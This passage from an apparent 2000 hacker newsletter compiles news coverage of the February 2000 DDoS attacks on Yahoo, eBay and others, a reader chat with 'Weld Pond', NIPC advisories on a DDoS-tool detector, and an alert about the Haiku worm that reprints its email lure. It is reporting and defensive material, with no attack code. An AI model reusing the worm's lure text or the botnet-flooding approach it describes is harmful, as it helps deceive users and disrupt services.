arrest while others still say they have little to go on. What is surprising is that some companies are not admitting that they were hit by this attack. Microsoft has admitted that a partner was hit but they would not identify which one. A Lycos statement said that they already take 'extensive precautions' and declined further details. Companies need to realize that clamming up and closing the doors will not prevent this sort of thing from happening again. Only through communication and the sharing and pooling of information will a solution, and the attacker(s), be found. The Industry Standard http://www.thestandard.com/article/display/0,1151,9615,00.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2435609,00.html Smart Money http://www.smartmoney.com/smt/markets/news/index.cfm?story=200002092 Wired http://www.wired.com/news/business/0,1367,34228,00.html ABC News http://www.abcnews.go.com/sections/tech/DailyNews/cyberchat0209.html Bloomberg http://quote.bloomberg.com/fgcgi.cgi?ptitle=Technology%20News&s1=blk&tp=ad_topright_tech&T=markets_fgcgi_content99.ht&s2=blk&bt=ad_bottom_tech&s=d800d17c2c921d2af0f66e0bc647be53 Fox News http://www.foxnews.com/vtech/020900/hack.sml CNN http://www.cnn.com/2000/TECH/computing/02/09/hackers29.a.tm/index.html Industry Standard: February 09, 2000 Web Hacks: Day Three By Polly Sprenger For the third day in a row, major Web sites were hit by denial-of-service attacks emanating from an unknown server by an unknown assailant. E-Trade and ZDNet joined the growing list of downed sites early Wednesday morning. The Federal Bureau of Investigation has scheduled a press conference for mid-morning Wednesday to review the damage caused and update the public about their investigation. Meanwhile, the much-publicized hacker underground is searching its ranks for the perpetrator. Wednesday's shutdowns follow the brief closure of Yahoo (YHOO) on Monday, and Amazon.com (AMZN) , eBay (EBAY) , CNN.com and Buy.com on Tuesday. Denial-of-service shutdowns are fairly simple to pull off; perpetrators simply flood a recipient Web site with requests for data, causing the site's servers to overload. All of the companies targeted were anxious to tell the public that although their site had gone down, there was no risk that sensitive information had been or would be compromised. "Please understand that this is strictly a 'denial of service' attack," eBay told its users. "This has NOT and does NOT jeopardize data, such as credit card information or auction information." While the sites wage a public relations campaign deriding hackers and defending the security of their systems, some of the numerous – and now famous – hacker groups are busy defending themselves as well. "That wasn't a hack, it was vandalism," says Chris Tucker, a longtime member of the hacker group Cult of the Dead Cow. "They're not hackers, they're vandals. DoS attacks are nothing new, really. In this case, they were coordinated against big-name sites and got some press attention." Organizations like Tucker's and others worry that anti-hacker paranoia will turn public perception against them. "We are currently building a consensus among other groups to address the media's misuse of the term 'hacker' as a community [and] to defend our good name," said "Macki," a representative of 2600, an organization which follows issues related to computer security. "We're working on a more in-depth commentary on this subject and talking with other groups about addressing the issue together." Other hackers agreed, adding that the media should focus on the sites that are getting attacked, not the hacker underground. "This is a wakeup call for people to show some responsibility before they hook up servers to the Internet," says "Simple Nomad," another hacker who lives his corporate life at a mainstream security company. But aside from the arguments over what does and does not constitute a hacker, the underground and the law-enforcement bodies agree on one thing: Tracking down the perpetrator of this week's actions could be a logistical nightmare. The perpetrator might be enhancing his street cred by continuing to bring down sites, but he's not improving the odds of eluding law-enforcement officials. The acclaimed "Weld Pond," a hacker with computer security group The L0pht, says that with each new site that goes down, the FBI gets more of the information it needs to pinpoint the source of the attacks. "I think they've probably proved their point and it would be stupid to keep going," he said. Pond is a "white hat" hacker, meaning that he avoids criminal activity; he says he hacks because it stretches his mind and enhances his consulting abilities. Pond explains that, while each new attack makes the search easier, "it's hard to trace these things back. When you trace a phone call, it's trivial. Tracing phone calls is built into the telephone infrastructure. There is no mechanism like that in the Internet." The requests that are flooding servers are coming from all over the country, so tracking down the machines from which the attacks originated requires a massive coordination effort. Different Internet service providers have to communicate with one another to pinpoint a single computer. And even when the machine is found, it seems unlikely that the vandal will be seated at a desk, typing away, waiting to be led off in handcuffs. "They will eventually find the machine that's doing it," says Pond. "But as for the person..." "They can only hope that the people who did this are complete idiots," agrees Simple Nomad. "If they were smart, the packets sent to Yahoo were forged. All that can be done is to slowly move up the chain, ignoring where the packet says it is coming from, and look to see where the traffic itself is coming from. Next, you find the compromised hosts, and hope that there are clues in logs there. These hosts were remotely controlled via a client piece of software – they may be able to trace this back, but the client software is probably on yet another compromised host. Yuck." Meanwhile, the latest foray by the mainstream media into hackerdom has elicited blase reactions from the underground. "I am being swamped with talking-head requests," sighs Space Rogue, editor of the Hacker News Network. Corrections: An earlier version of this story included Datek among the attacked sites. In fact, a Datek vendor had experienced a temporary router problem that was not related to the hacker attacks. -=- Smart Money; February 9, 2000 Inside the Hack Attack on the Web By Cintra Scott and Ian Mount IF YOU CAN read this, SmartMoney.com is lucky. Call it cybervandalism, or even cyberterrorism. In the last 48 hours, it's been rampant. Using an apparently simple plan of attack known as "denial of service," an unknown hacker (or hackers) has humbled the Internet's biggest sites by bombarding them with packets of data. Simply put, the denial-of-service attacks bring Web sites to their knees for hours, because their lines are all tied up. In the good news category, the victims' infrastructures are not at all compromised; no credit card numbers are stolen nor is anything lost or damaged. As of midday Wednesday, the list of apparent targets spans from Amazon.com (AMZN) to ZDNet (ZDZ) — with Buy.com (BUYX), Time Warner's (TWX) CNN.com, privately held Datek Online, eBay (EBAY), E*Trade Group (EGRP), TD Waterhouse (TWE) and Yahoo! (YHOO) reporting apparently related problems. Most of these sites have experienced slowdowns and outages for a few hours in some U.S. locations. So far, the financial impact of the outages has been called negligible by analysts, but the fear is that it could happen again (and again). That could be why the Nasdaq rally finally pooped out Wednesday, after the composite index hit new highs on both Monday and Tuesday. Amazon.com shares fell $10.72, or 2.9%; eBay shed $5.75, or 3.4%; E*Trade sunk $1.13, or 4.3%, and Yahoo was down $10.75, or 2.9%. But unlike those Internet blue chips, Buy.com stock climbed $2.38, or 9.5%, to $27.50. Buy.com shares have been trading for only two days, and the site has experienced apparent hacking troubles on both days. While many consumers are hearing about the problem for the first time this week, the tech community has been aware of the threat for years. The FBI's National Infrastructure Protection Center has issued many alerts on the latest "DoS" threats. Most recently, on New Year's Eve, the FBI warned that it had seen "multiple reports of intruders installing distributed denial-of-service tools on various computer systems to create large networks of hosts capable of launching significant coordinated packet flooding denial-of-service attacks." (Got that?) This afternoon, Attorney General Janet Reno announced a criminal investigation into the matter, vowing that federal law-enforcement officials would do everything in their power to combat cyberterrorism. And at a press conference this afternoon, the FBI's Ronald Dick suggested the attacks could be related to the recent proliferation of two hacking programs called Tribe Flood Network (TFN) and TRINOO. Meanwhile, the hacking site 2600 reports that the assaults may have been launched with another troublesome "tool" called Smurf. Mischievous hackers can download such programs from various sites on the Web. Then, using fairly basic hacking techniques, they install the program on several hundred low-security servers and then set them to go off at a certain time. (These hosts may be computers at schools and universities, which often have fairly lax security.) The hackers can then launch a coordinated flood of hundreds of packets of data to a targeted Web site. Imagine the data packet says "hi" to each of the Web site's servers. Each server then acknowledges the packet by responding with something like "yes, I'm here." Those responses then trigger more packets of information, and the attack is amplified (hundreds multiplied by hundreds of packets). And that's how the resulting data traffic jam clogs up the servers. It's a high-tech equivalent of tying up an 800 number by getting all your friends (and all their friends) to call in at once. Nobody else can get through. "The problem is that it's next to impossible to prevent," says Robert Kolstad, an editor of security news for SANS (System Administration, Networking, and Security) Institute, a cooperative research organization. Once the problem is detected, Kolstad notes, the Web site's administrators can try to repel some of the packets with filters, as Yahoo did on Monday. The filters reject data packets coming from any suspicious locations. With some quick work, an attack can be thwarted with minimal down time. But clever hackers can make filtering cumbersome if their packets seem to originate from, say, thousands of locations that keep shifting. So far, though, eBay, E*Trade and the rest have been up and running again within a couple of hours. Such attacks don't require heavy computing power. According to Weld Pond, a research scientist at Boston-based security consultancy @Stake (who uses a hacking handle instead of his real name), all that's necessary is a fast connection with which to set off the flood. "It could be a five-year-old computer, but if it's sitting on a network at a university or corporation, it probably has a really good connection to the Internet," he says. Nor do these denial-of-service attacks display much skill or originality. The programs are easily downloadable from various hacking sites on the Web. And while it's time-consuming to hack into and prepare the hundreds of servers required to overwhelm a Web site, Weld Pond says it's not particularly difficult. "It's the kind of thing that, if you were at average proficiency with Internet software, you could probably learn in a few hours," he says. "It probably took a few months to set up, to gather the amount of machines to attack. Whoever's doing this is industrious." Because of the anonymity and ease of the attacks, it's very difficult to track down who launched them. The assault may seem to come from servers in New York or Mountain View, Calif., but the hacker may be a loner in a basement in Crested Butte, Colo. "The speculation is that they're going to brag about it," Kolstad says. And that, he thinks, is the best hope for tracking down the perpetrators. The attacks also seem to show a vicious sense of humor. The first assault, on Yahoo, came a few short minutes after AT&T Labs security expert Steven Bellovin gave a speech on denial-of-service attacks at the just-completed North American Network Operators' Group (NANOG) meeting in San Jose, Calif., which suggests that the attacks were timed by "someone trying to prove a point," Weld Pond says. Whatever point that was, computer experts express disdain for whoever is behind the attacks. Mark Gebert, senior systems research programmer at Merit Network, the nonprofit regional network that sponsors the NANOG meetings, bristles at the labeling of the attackers as "hackers." According to Gebert, they are known in the computer community as "crackers" and "script kiddies" because of their dependence on preprogrammed tools. Their assaults on Web sites may not be particularly elegant or inventive — but that doesn't make them any less illegal. -=- Smells Like Mean Spirit by Leander Kahney 10:50 a.m. 9.Feb.2000 PST Hackers, who pride themselves on Web attacks with a purpose, are scornful of the "packet monkeys" responsible for this week's attacks on Yahoo, CNN, and other high-profile sites. The cracker or crackers responsible for the attacks have been contemptuously dubbed "packet monkeys" because their exploits involve flooding a site with packets of information and, detractors say, betray a distinctly simian intelligence. Like "script kiddies" who use well-documented techniques and readily available software to deface Web sites, packet monkeys are dismissed as adolescent vandals by a community that celebrates know-how, originality, and creativity. "There's no technical prowess whatsoever in these kind of attacks," said "Space Rogue," a research scientist with @Stake (formerly the highly respected L0pht Heavy Industries) and editor of the Hacker News Network. "This isn't anything new. This is old, tired technology someone is running in a big way." "This kind of thing is really frowned on," said YTCracker, a 17-year-old high school student from Colorado, who recently claimed responsibility for cracking a number of U.S. government sites. "It's a bunch of bored kids trying to show they have the guts to do this.... We don't like to be associated with these people." No one has come forward to claim responsibility for the attacks. Unlike a vandalized Web site, where the cracker usually leaves a moniker, says hi to his friends, or taunts law enforcement, a packet monkey attack leaves no public traces and no clue to the cracker's identity. Space Rogue said crackers typically advertise their exploits to gain acceptance with their peer group. In fact, this is frequently the motive for the attack. "It makes you wonder what kind of person is pulling this off and why they're doing this," he said. "There's no public record, no boasting, nothing left behind." Space Rogue said there is also very little gossip about the identity and motive of the attackers. "Rumors are scarce on this one," he said. "That's unusual.... My gut feeling tells me it's an individual and not a group, but I don't have any evidence to back that up." Although most hackers condemn the attacks, at least one poster to Slashdot professed his "grudging admiration" for what appears to be a concerted demonstration against the commercialization of the Internet. "This is the equivalent of a blockade -- a formal, organized protest," wrote "Swordgeek." "Not throwing rocks through windows so much as linking arms in front of a police line. "The brats and miscreants may have gotten their shit together and started to fight for something worthwhile, rather than simply for the hell of it." -=- ABC A Tangled Web: A Chat with Former Hacker “Weld Pond” Feb. 9 —ZDNet became one of the latest victims of a cyber attack when the site was taken offline for at least two hours today. A ZDNet spokeswoman told ABCNEWS.com the company believes the strike most likely came from the same group of attackers responsible for knocking at least four other major Web sites offline, including Amazon.com and eBay.com, in the past two days. Why are these major sites under attack? Who is responsible for these acts, and can the culprits be caught? How secure is the Internet? Former hacker “Weld Pond” answered questions from ABCNEWS.com readers today in an online chat. Weld has testified before the Senate on the state of Internet security and is currently a research scientist at security services provider @Stake. Below is a transcript of the chat. Moderator at 2:58pm ET Welcome to our live chat with former hacker "Weld Pond." Thanks for being here today. Weld Pond at 2:59pm ET Hi, glad to be here. Moderator at 2:59pm ET Any idea who's responsible for these recent cyber attacks? Weld Pond at 3:00pm ET It could be anybody from a 15-year old kid to a foreign government. But I think it is more likely the former. Kingpin from 230.73.33.cypresscom.net at 3:01pm ET Why do you think it takes a major event such as this to occur before people begin to think about security? Shouldn't security be designed into the system from the start, not added AFTER something happens? Weld Pond at 3:01pm ET Because it takes time and money to design security from the start. People are optimists and don't think the worst will happen. KBear at 3:02pm ET Should companies be worried that hackers might have contacts inside their firms? People with grudges? Weld Pond at 3:03pm ET People should be worried about insiders at a company more than outsiders. This is how most security breaches occur. They just are not reported that often. Moderator at 3:03pm ET Tipo asks: How does someone become a hacker? Is there some sort of initiation? Weld Pond at 3:04pm ET There is no initiation to become a hacker. Most are self-taught and are reasonably proficient before they seek out other hackers to exchange information with. M T Bethel from viagrafix.com at 3:04pm ET What would be the benefit to anyone (or group) who would coordinate such an attack? Weld Pond at 3:05pm ET I think these big name attacks are mostly for bragging rights. To impress your peers. Moderator at 3:05pm ET Matthew asks: Is this a lesson in how fragile the Internet is, or a new form of terrorism? Weld Pond at 3:07pm ET Well I think it is both. The Internet was not designed to be robust to denial of service attacks. It just wasn't thought about at the time. This is a new form of terrorism. People follow the technology to where the important and powerful are and try to disrupt and scare them. RBeesto from co.polk.ia.us at 3:07pm ET Do you think this is the start of some kind of cyber siege, to be duplicated by numerous copycats? Weld Pond at 3:07pm ET I think it will be copied. With all the media attention this is getting it is the perfect way for someone to gain attention. Goodguy at 3:08pm ET Do you have the knowledge or ability to do something like this? Weld Pond at 3:09pm ET Yes. Anyone who follows the computer security forums on the Internet knows how to do this. The tools and instructions are available widely. This is just the first time someone has tried it on very big Web sites. Howard at 3:09pm ET How is a "denial of service" attack harder to secure against than an electronic break-in? What steps would YOU take if you were Yahoo, or eBay? Weld Pond at 3:10pm ET It is much harder because the attacker is taking advantage of what the network was designed to do — deliver a lot of packets (or data) efficiently. It is hard to tell just busy network traffic from the attack traffic. To stop it you need to understand the exact attack and try to filter it out on the routers that connect the Web sites to the Internet. Martel from cc.ncsu.edu at 3:11pm ET Do you think these high-profile attacks may be a distraction from smaller, intrusive attacks against other sites? Weld Pond at 3:11pm ET Quite possibly. These attacks could be just a diversionary tactic. That is a standard technique to get around security mechanisms. Crackerjack at 3:12pm ET How hard will it be for the FBI to track down the parties responsible? Weld Pond at 3:13pm ET It is very difficult to track down the attacker in a denial of service attack. The data sent in the attack does not have to have valid return addresses so the packets need to be traced back one router hop at a time. Moderator at 3:14pm ET PJ asks: What's the likelihood of these crackers being caught? Do you think they're afraid of being caught? Weld Pond at 3:15pm ET The attackers have probably taken steps to anonymize themselves. It will be difficult to track them down. The longer they keep doing it the more time they give to be traced back however. Moderator at 3:15pm ET RayHS1 asks: What actual crimes or offenses have been committed with these attacks? Weld Pond at 3:16pm ET It is a federal crime to disrupt someone's computer service. The same law that was used to prosecute the writer of the Melissa virus would be used in this case. null from enoch.org at 3:17pm ET Weld, l0pht has said in the past that one of the best ways to carry across the message that the term 'hacker' does not necessarily equate 'criminal' to the general public is for non-criminal hackers to identify themselves as such. Does it bother you, then, to be featured on ABCNews.com billed as a "former hacker"? Weld Pond at 3:18pm ET I would rather still be called a hacker than former hacker. I'm wearing an @Stake tshirt right now and it has "Hacker" emblazoned on the back. :-) John in Dallas from cadence.com at 3:18pm ET What about the small companies — how do small companies protect against this type of stuff without the capital to purchase all this protection ? Weld Pond at 3:19pm ET Small companies need to demand better security from their vendors, whether they are their ISPs, hardware, or software providers. aj from rpr.rpna.com at 3:19pm ET If the hackers do not have a valid address or IP address, how do they access the Net and wouldn't that flag an ISP somewhere? Weld Pond at 3:20pm ET They are connected with a valid IP address but they can still send other data that has invalid IP addresses unless their ISP is filtering/detecting that. Most ISPs do not do this. That is a problem that needs to be fixed. BVRWINS from city.palo-alto.ca.us at 3:21pm ET Can attacks like these be carried out by a single computer? Or are these coming from an organized group? Weld Pond at 3:21pm ET There are probably a few computers that are controlling 100s or 1000s of machines in tandem. That is the only way a huge site like Yahoo could be taken down with denial of service. John from cm-media.com at 3:22pm ET Hackers often claim they're performing a service by liberating information and testing security systems. Do you see any such "positive" effects in these cases, or is it simple harassment? Weld Pond at 3:23pm ET Sometimes it takes an actual demonstration of the problem before anyone does anything. I don't advocate denial of service attacks but I can see how they are a wake-up call to people who have been ignoring the problem. aNoViCe at 3:24pm ET Are there legitimate reasons for data not to have valid return addresses? If not, wouldn't it solve the problem to have servers not accept packets without valid return addresses? Weld Pond at 3:26pm ET There is no legitimate use for them. All routers should have ingress filters to make sure that the IP addresses they are accepting are valid. It is not feasible to check for validity on the Internet backbone routers or at the Web site's router. This test must be done at each ISP that connects an organization or person to the Internet. This needs to be done to start to combat this problem. Dan in Philly at 3:27pm ET Do you believe the glorification that comes with such media exposure will fuel others to attempt similar attacks, and if so what can the media do with companies to responsibly report such problems? Weld Pond at 3:28pm ET I think it will definitely fuel more copycats. I think having other hackers speaking out that denial of service attacks are stupid and that they do not show any technical prowess may help. The people who launch these attacks are just vandals and they should be described that way. jbomma from ford.com at 3:28pm ET Isn't this really an example of the adage: "Criminals are always one step ahead". Once this problem is solved, hackers will continue to invent new types of attacks, will they not? Weld Pond at 3:13pm ET These types of attacks were well known for at least a year. It is just that no one has taken the time to try and come up with a solution until now. It seems like the attackers are a step ahead but it is only because the public only finds out about the problems after the attackers strike. Moderator at 3:23pm ET Suppression asks: Are you concerned that the officials may go too far in their attempt to find these individuals? Is there a real possibility of a permanent invasion of privacy as to the activity of law-abiding Web users? Weld Pond at 3:33pm ET It scares me that the government may take a monitoring and surveillance approach to solving these problems. I don't think this is a good solution plus it invades the privacy of law-abiding Internet users. The solution is to design secure networks and to secure the computers that are being compromised to launch the distributed attacks from. Moderator at 3:33pm ET Thanks for your time today, Weld. Any final words for our audience? Weld Pond at 3:34pm ET It was great to be here to answer these questions. I think that eventually there will be a solution to these denial of service problems. But I think it will take some time to design and put in place. Until then I expect to see more attacks like this. Moderator at 3:35pm ET Stay with ABCNEWS.com for continuing coverage of this story. And click here to check out other recent ABCNEWS.com chats. -=- CNN: Classic Hackers Decry Heavy-Handed Upstarts February 9, 2000 Web posted at: 4:14 PM EST (2114 GMT) By Jessica Reaves In the world of Internet hacking, as in the world of rap music, there is the old school, and then there are the insurgents. The former tends to view the latter with some suspicion, and perhaps a bit of jealousy. Such was the case Wednesday; establishment hackers are up in arms over the media attention paid to Monday and Tuesday's attacks on Yahoo, eBay, CNN and Buy.com. "We find that there are already ample words in the English language to describe such miscreants and call upon the media to define them by their actions, as they are all we know them by at this point," fumed the editors of 2600, The Hacker Quarterly. Fiercely protective of their reputation, longtime hackers are locked in a love-hate relationship with web site designers, who grudgingly appreciate hackers' talent for pinpointing serious security lapses. "Hacking is generally accepted to be the arena of very smart people," says Stuart McClure, president of Rampart Security Group in Irvine. "Denial of service attacks, like what happened to Yahoo and eBay, are seen as bottom-of-the-barrel assaults; they don't require a lot of brains." When a site has been hacked, its appearance is often altered by chest-beating hackers who leave the cyber equivalent of a "Kilroy was here" scrawl. This week's attacks, on the other hand, bombarded various high-traffic sites with an overflow of information, effectively shutting down normal operations. How do the perpetrators send so much data so quickly? Apparently, the most recent assaults are not typical denial of service pranks, which generally are sent from only one or two computers at a time. "These people scan the Internet for vulnerable systems, and they hack into those systems, and then use hundreds of those computers, remotely, to send the attack," says McClure. The latest string of invasions may inspire some instances of increased security, says McClure, but consumers shouldn't expect a sudden influx of super-secure sites. "There are ways to keep these attacks from happening, but few companies implement them. Security tends to take a backseat to aesthetics and ease of service at the site," McClure says. And while Net businesses may be tempted to pump their time and money into the more visible aspects of a site, the current threat to their bottom line may force them to rethink their priorities. After all, seeing a multibillion-dollar web site brought to its knees by a group of not-so-bright pranksters doesn't inspire a whole lot of confidence on Wall Street -- or among consumers and advertisers. Copyright © 2000 Time Inc. @HWA 125.0 HNN: Feb 10th; NIPC Releases Detection Tools ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by jericho NIPC has developed a new release of the software application that will detect tfn2k client, tfn2k daemon, trinoo daemon, trinoo master, tfn daemon, tfn client, stacheldraht master, stacheldraht client, stachelddraht demon and tfn-rush client. This new version (find_ddosv31) is now available for Solaris on Sparc or Intel platforms and Linux on Intel platforms and will no longer improperly identify itself or any previous version as a DDOS program. NIPC http://www.fbi.gov/nipc/trinoo.htm Unfortunately they are only distributing executables and not source. With all the recent cases of the FBI and NSA trying to pass legislation that will allow them to backdoor various communications systems, computer networks and everything else.. how could anyone trust these? FBI: UPDATED Version 3.1 Released NATIONAL INFRASTRUCTURE PROTECTION CENTER; TRINOO/Tribal Flood Net/tfn2k During the past few weeks the NIPC has seen multiple reports of intruders installing distributed denial of service tools on various computer systems, to create large networks of hosts capable of launching significant coordinated packet flooding denial of service attacks. Installation has been accomplished primarily through compromises exploiting known sun rpc vulnerabilities. These multiple denial of service tools include TRINOO, and Tribe Flood Network (or TFN & tfn2k), and has been reported on many systems. The NIPC is highly concerned about the scale and significance of these reports, for the following reasons: Many of the victims have high bandwidth Internet connections, representing a possibly significant threat to Internet traffic. The technical vulnerabilities used to install these denial of service tools are widespread, well-known and readily accessible on most networked systems throughout the Internet. The tools appear to be undergoing active development, testing and deployment on the Internet. The activity often stops once system owners start filtering for TRINOO/TFN and related activity. Possible motives for this malicious activity include exploit demonstration, exploration and reconnaissance, or preparation for widespread denial of service attacks. NIPC requests that all computer network owners and organizations rapidly examine their systems for evidence of these distributed denial of service (DDOS) tools (specific technical instructions are available from CERT-CC, SANS, NIPC, or other sources). The NIPC is making available on its web site a software application that can be used to detect the presence of these DDOS tools. Recipients are asked to report significant or suspected criminal activity to their local FBI office or the NIPC Watch/Warning Unit, and to computer emergency response support and other law enforcement agencies, as appropriate. The NIPC Watch and Warning Unit can be reached at (202) 323-3204/3205/3206, or nipc.watch@fbi.gov. This latest update reflects that NIPC has developed a new release of the software application that will detect tfn2k client, tfn2k daemon, trinoo daemon, trinoo master, tfn daemon, tfn client, stacheldraht master, stacheldraht client, stachelddraht demon and tfn-rush client. This new version (find_ddosv31) is now available for Solaris on Sparc or Intel platforms and Linux on Intel platforms and will no longer improperly identify itself or any previous version as a DDOS program. This executable (find_ddosv31_{platform}.tar.Z) is for Solaris 2.5.1, 2.6, and Solaris 7 on the {Sparc} or {Intel} platforms, and {Linux} on Intel platforms. This file will not work on a Windows-based PC. (Follow link for executables - Ed) -=- Press Release: For Immediate Release December 30, 1999 Washington D.C. FBI National Press Office The FBI today issued the following statement: Over the last several weeks, the National Infrastructure Protection Center (NIPC) has received multiple reports of the presence of Distributed Denial of Service (DDOS) tools on computer systems in the United States. The NIPC issued alerts about these tools on December 6, 1999 and today (see http://www.nipc.gov). The CERT at Carnegie Mellon has also issued an incident note (IN-99-OT) on November 18, 1999, and an update on December 28, 1999 (see http://www.cert.org/incident_notes/IN-99-07.html). These DDOS tools have also now been reported by the media and published on the Internet. These DDOS tools, such as "trin00" and "Tribe Flood Network" ("tfn"), are capable of generating sufficient network traffic to render the targeted network or computer system inoperable. Installation has been accomplished primarily through compromises exploiting known Sun RPC vulnerabilities. Basically, these tools allow an intruder to have multiple victim systems launch denial of service attacks against other systems that are the ultimate target. The NIPC has developed a software application that can be used by system administrators to scan their computer systems to determine whether they contain the "trin00" or "tfn" tools and therefore might be used as part of a DDOS attack on another network. The latest version of this detection software can be downloaded from the NIPC Internet Web site (http://www.nipc.gov). The NIPC requests that computer network administrators report the detection of DDOS tools or other apparent criminal activity on their systems to their local FBI Field Office or to the NIPC at nipc.watch@fbi.gov. NIPC Director Michael Vatis stated: "A central part of the NIPC's mission is to help protect critical computer networks by alerting private industry and government agencies of potential threats before an attack occurs. In this case, we have gone one step further by developing a software application that can be used to detect the presence of a significant hacker tool and neutralize it." The NIPC commenced its Y2K Command Post at FBIHQ yesterday, and will operate 24 hours a day until January 5. In addition, each FBI Field Office has initiated a Command Post. These Command Posts have been established to facilitate the FBI's detection of and response to any criminal activity, cyber or physical, that might occur during the Millennium rollover period. The NIPC is a multi-agency organization whose mission is to detect, warn of, respond to, and investigate computer intrusions and other unlawful acts that threaten or target our Nation's critical infrastructures. Located in the FBI's headquarters building in Washington, D.C., the NIPC brings together representatives from the FBI, other U.S. government agencies, state and local governments, and the private sector in a partnership to protect our Nation's critical infrastructures. More information on the NIPC is available on the World Wide Web at http://www.nipc.gov. The following MD5 checksums should be used to validate the files available for downloading: MD5 (README-find_ddos) = 4f6269ebb6b695162ccd919c4df9385d MD5 (find_ddos.tar.Z) = 4522f64b491664f93eca27283d2f77ba @HWA 126.0 HNN: Feb 10th; The Underground Reaction ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Macki and Bronc 2600.com has an interesting viewpoint on this whole mess and the media representations of hackers. 2600.com http://www.2600.com/news/2000/0209.html Bronc Buster has posted an article with more opinions from the underground about these recent attacks. The Synthesis http://www.thesynthesis.com/tech/takedown/index.html 2600: HACKERS TO BLAME? DOUBTFUL 02/09/00 We feel sorry for the major Internet commerce sites that have been inconvenienced by the Denial of Service attacks. Really, we do. But we cannot permit them or anyone else to lay the blame on hackers. So far, the corporate media has done a very bad job covering this story, blaming hackers and in the next sentence admitting they have no idea who's behind it. Since the ability to run a program (which is all this is) does not require any hacking skills, claiming that hackers are behind it indicates some sort of knowledge of the motives and people involved. This could be the work of someone who lost their life savings to electronic commerce. Or maybe it's the work of communists. It could even be corporate America itself! After all, who would be better served by a further denigration of the hacker image with more restrictions on individual liberties? Let's look at the headlines: "Government sees cyber-attacks as disruption of commerce." "Justice Department wants more funds to fight cyber crime." Didn't take them long, did it? And later in the same story: "But the FBI may never know who is responsible for the cyber-attacks, due to the difficulty in tracing the electronic trails, a senior law enforcement source told CNN." How convenient. An unseen villain. No need for any actual FACTS to be revealed, but plenty of blame to be cast on hackers everywhere. We find it to be a bit too contrived. Whoever is responsible is either completely clueless or knows EXACTLY what they're doing. It's the latter that should concern hackers everywhere. Number of times hackers were named or implied as culprits on these sites: cnn.com 14 msnbc.com 13 zdnet.com 4 abcnews.com 0 -=- Bronc; So it comes to pass, the biggest names of the Internet are taken down in some of the most massive denial of service attacks ever launched against these major portals and web sites. Yahoo, one of the top three most visited sites on the Internet, was reported to have been down for three hours on Sunday. Buy.Com had been taken down for several hours as well early Monday, with CNN and eBay unreachable during the afternoon, and then Amazon.Com and Zdnet.Com unreachable for hours late Monday night—reportedly all the targets of the latest round of attacks on Monday. The main questions that beg to be answered are who is doing this, and why. Several stories have been done in the last day, based mostly on rumors that have been floating around and "expert" opinions as to what was happening and why, but there aren't many hard facts among them. Several stories have reported the problem as a huge Denial of Service attack, where crackers launch a large amount of false requests at a server, basically clogging it up so other users can not reach it. A few stories have reported that the Yahoo problem was just that, an internal problem with the company that provides Yahoo with their connection to the Internet, and not an attack. Still others have reported both poorly configured equipment and a combination of attacks. It is clear now, with the attacks against CNN, Buy.Com, eBay, Amazon and Zdnet today, that there is someone, or some group, out there with an agenda, attacking these sites on purpose. The reasoning behind it may remain unknown for now, but many in the hacker community are speculating what kind of attacks are being used to cause this type of massive denial of service, and what the motives might be behind it. A hacker with Condemned.Org, who goes by the name b|ueberry, said she thought the attacks were done using a program called "Trinoo," which allows one person to set up several systems (thousands possibly) across the Internet and use them in a coordinated attack. This type of program allows the attackers to easily utilize a large network of boxes they have control of across the Internet, and use them to strike at once against their desired targets. As to why these attacks were taking place, she speculated that they "were a bunch of idiots with nothing better to do…" Her harsh words were echoed across the net. "The people who did this are most likely bored 15 year olds with nothing better to do than be a menace," said Eli Bottrell, system administrator for SysAdmins.Com. Others that were questioned about their views on these attacks followed suit, saying that the assaults were most likely being perpetrated by youngsters either out to impress friends or make a name for themselves. One unnamed expert was quoted on the Today Show this morning claiming he had gotten an e-mail from the attackers. This e-mail, he said, claimed that the attackers were mad at the commercialization of the Internet and at the specifically targeted sites, and also went on to state that the attacks would continue against other large sites. Reports coming out of San Francisco say that the FBI there has opened an investigation into this matter, and is also looking into some of the effected companies. One story had unconfirmed reports of the attacks being traced back to a central computer where a list of possibly of up to ten thousand compromised systems was found. Although large-scale Denial of Service attacks are nothing new to the Internet, not many have been seen on such a large scale against so many targets, as is the case here. Administrators and security experts are sometimes baffled when it comes to stopping these attacks because of the shear size of the assault, and the multiple locations of origin around the Web. In either case, most people questioned shared the view that the attackers would be caught sooner of later. Bronc Buster is a California-based hacker and can be reached at bronc@thesynthesis.com @HWA 127.0 HNN: Feb 10th; Haiku Worm Now on the Loose ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Arik A worm known as Win32 Haiku.16384, or Haiku Worm for short, has been identified as a potential threat to Internet sites. Once infected the worm searches a victims hard drive for email addresses and then mails itself out to every address it finds. PR Newswire - via Yahoo http://biz.yahoo.com/prnews/000209/ny_ca_warn_1.html Wednesday February 9, 8:27 am Eastern Time Company Press Release SOURCE: Computer Associates International, Inc. Computer Associates Warns of New 'Haiku' Worm Media Alert for Wednesday, February 9, 2000 ISLANDIA, N.Y., Feb. 9 /PRNewswire/ -- Computer Associates International, Inc. (CA) today warned computer users of the ``Win32 Haiku.16384'' Worm, which has the potential to overload network traffic, impacting the availability of resources. The increase in network traffic may degrade eBusiness performance, making end users unable to connect to email and eCommerce sites. CA has the detection and the fix for this Worm, which was reported by a client. The Haiku Worm arrives in an email with the subject line ``Fw: Compose your own haikus!'' The email will have the file Haiku.exe attached. The text of the message reads: :)) "Old pond... a frog leaps in water's sound." -Matsuo Basho. DO YOU WANT TO COMPOSE YOUR OWN HAIKUS? Haiku is a small poetry with oriental metric that appeared in the XVI century and is being very popular, mainly in Japan and the USA. It's done to transcend the limitation imposed by the usual language and the linear/scientific thinking that treat the nature and the human being as a machine. It usually has 3 lines and 17 syllables distributed in 5, 7 and 5. It must register or indicate a moment, sensation, impression or drama of a specific fact of nature. It's almost like a photo of some specific moment of nature. More than inspiration, what you need in order to compose a real haiku is meditation, effort and perception. DO YOU WANT TO COMPOSE YOUR OWN HAIKUS? Now you can! it is very easy to get started in this old poetry art. Attached to this e-mail you will find a copy of a simple haiku generator. It will help you in order to understand the basics of the metric, rhyme and subjects which should be used when composing a real haiku... just check it out! it's freeware and you can use and spread it as long as you want! If Haiku.exe is run, it copies itself to C:\WINDOWS\HAIKUG.EXE and edits the 